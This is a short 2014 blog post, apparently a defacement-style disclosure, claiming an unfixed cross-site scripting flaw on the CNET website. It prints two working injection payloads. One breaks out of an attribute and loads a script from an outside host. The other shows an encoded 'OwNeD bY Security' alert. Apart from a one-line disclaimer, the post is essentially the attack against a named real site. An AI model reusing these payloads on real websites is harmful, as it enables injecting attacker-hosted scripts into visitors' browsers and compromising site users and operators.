Tuesday, 6 May 2014
3 comments

XSS in CNET Website Not Fixed [#POC]


Brazilian Security Researcher Found XSS in CNET Website [#POC]

XSS IN CNET Payload are as follows:

Injected payload: "><script src=http://yourjavascript.com/4111219525/sechaha.js></script>


Injected payload 2: 
"><script>alert(String.fromCharCode(35, 79, 119, 78, 101, 68, 32, 98, 89, 32, 83, 101, 99, 117, 114, 105, 116, 121))</script>


Disclaimer: This payload is only education purpose. We are not responsible for any kind of damage.

About The Author:
Erick Andrade, studied at the Federal University GIS Data Android Mobile Development
PHP / SQL,  Analyst in Information Security in Brazil.

3 comments:

 
Toggle Footer
Top